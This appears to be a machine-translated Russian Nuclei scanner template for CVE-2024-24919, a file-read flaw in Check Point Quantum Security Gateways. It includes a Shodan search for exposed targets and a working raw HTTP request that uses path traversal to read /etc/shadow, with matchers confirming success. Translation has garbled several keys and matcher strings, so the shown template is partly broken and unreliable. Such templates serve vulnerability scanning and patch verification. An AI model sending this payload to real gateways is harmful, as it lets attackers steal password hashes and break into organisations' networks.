Уязвимость произвольного чтения файлов в шлюзе безопасности Check-Point (CVE-2024-24919)

описания

Check Point Security Gateways - это семейство решений для обеспечения сетевой безопасности от Check Point Software. Эти решения, включающие межсетевые экраны нового поколения (NGFW), шлюзы безопасности центров обработки данных и квантовые шлюзы на базе искусственного интеллекта, предназначены для обеспечения передовой защиты организаций от сложных киберугроз. Они обеспечивают безопасность сетей, облаков, мобильных устройств и конечных точек с помощью интегрированной защиты от угроз, унифицированного управления безопасностью и контроля политик.

id: CVE-2024-24919

информация.
название: Check Point Quantum Gateway - раскрытие информации
Автор: johnk3r
серьезность: высокая
описание:|
CVE-2024-24919 - это уязвимость раскрытия информации, которая может позволить злоумышленнику получить доступ к определенной информации на подключенных к Интернету шлюзах которые были настроены с помощью IPSec VPN, VPN удаленного доступа или программного блейда мобильного доступа.
ссылка.
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
метаданные.
max-запрос: 1
производитель: контрольно-пропускной пункт
продукт: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*:*:*:*:*:*:*:*:*:*:*.
shodan-query: html: "Check Point SSL Network"
проверено: правда
теги: cve, cve2024, контрольная точка, lfi

http.
- сырой.
– |
POST /clients/MyCRL HTTP/1.1
Хост: {{Hostname}}

aCSHELL/... /... /... /... /... /... /... /etc/shadow

матчи-условия: и
матчеры.
- тип: regex
часть: тело
regex.
- "root:"
- "Никто:"
условие: и

- тип: состояние
статус.
– 200